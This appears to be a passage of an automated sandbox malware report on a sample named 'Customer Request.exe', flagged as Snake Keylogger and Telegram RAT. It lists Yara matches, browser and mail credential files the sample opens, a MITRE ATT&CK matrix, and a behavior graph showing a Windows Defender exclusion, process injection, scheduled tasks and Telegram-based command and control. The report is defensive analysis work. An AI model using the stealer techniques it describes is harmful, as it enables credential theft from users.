                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Users\user\AppData\Roaming\gCFuOglEso.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Users\user\AppData\Roaming\gCFuOglEso.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Customer Request.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2704835617.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2745993906.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2717613443.000000000449A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2741223606.00000000062EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.000000000312F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2746777636.0000000007445000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2741223606.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2717700479.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2741655848.0000000006798000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2717700479.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2717613443.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\Customer Request.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.000000000312F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2704835617.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2745993906.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2717613443.000000000449A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2741223606.00000000062EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.000000000312F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2746777636.0000000007445000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2741223606.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2717700479.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2741655848.0000000006798000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2717700479.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2717613443.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job                  		112
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job                  		2
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Software Packing                  		NTDS11
                  Security Software Discovery                  		Distributed Component Object Model1
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1619174 Sample: Customer Request.exe Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 49 reallyfreegeoip.org 2->49 51 api.telegram.org 2->51 53 2 other IPs or domains 2->53 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 71 13 other signatures 2->71 8 Customer Request.exe 7 2->8         started        12 gCFuOglEso.exe 2->12         started        signatures3 67 Tries to detect the country of the analysis system (by using the IP) 49->67 69 Uses the Telegram API (likely for C&C communication) 51->69 process4 file5 41 C:\Users\user\AppData\...\gCFuOglEso.exe, PE32 8->41 dropped 43 C:\Users\...\gCFuOglEso.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmpBA61.tmp, XML 8->45 dropped 47 C:\Users\user\...\Customer Request.exe.log, ASCII 8->47 dropped 73 Adds a directory exclusion to Windows Defender 8->73 75 Injects a PE file into a foreign processes 8->75 14 Customer Request.exe 15 74 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        27 2 other processes 8->27 77 Multi AV Scanner detection for dropped file 12->77 22 gCFuOglEso.exe 12->22         started        25 schtasks.exe 12->25         started        signatures6 process7 dnsIp8 55 checkip.dyndns.com 132.226.8.169, 49712, 49717, 49718 UTMEMUS United States 14->55 57 api.telegram.org 149.154.167.220, 443, 49743, 49747 TELEGRAMRU United Kingdom 14->57 59 reallyfreegeoip.org 104.21.112.1, 443, 49713, 49715 CLOUDFLARENETUS United States 14->59 79 Moves itself to temp directory 14->79 81 Loading BitLocker PowerShell Module 18->81 29 conhost.exe 18->29         started        31 WmiPrvSE.exe 18->31         started        33 conhost.exe 20->33         started        39 C:\Users\user\AppData\...\tmpG548.tmp (copy), PE32 22->39 dropped 83 Tries to steal Mail credentials (via file / registry access) 22->83 85 Tries to harvest and steal browser information (history, passwords, etc) 22->85 35 conhost.exe 25->35         started        37 conhost.exe 27->37         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.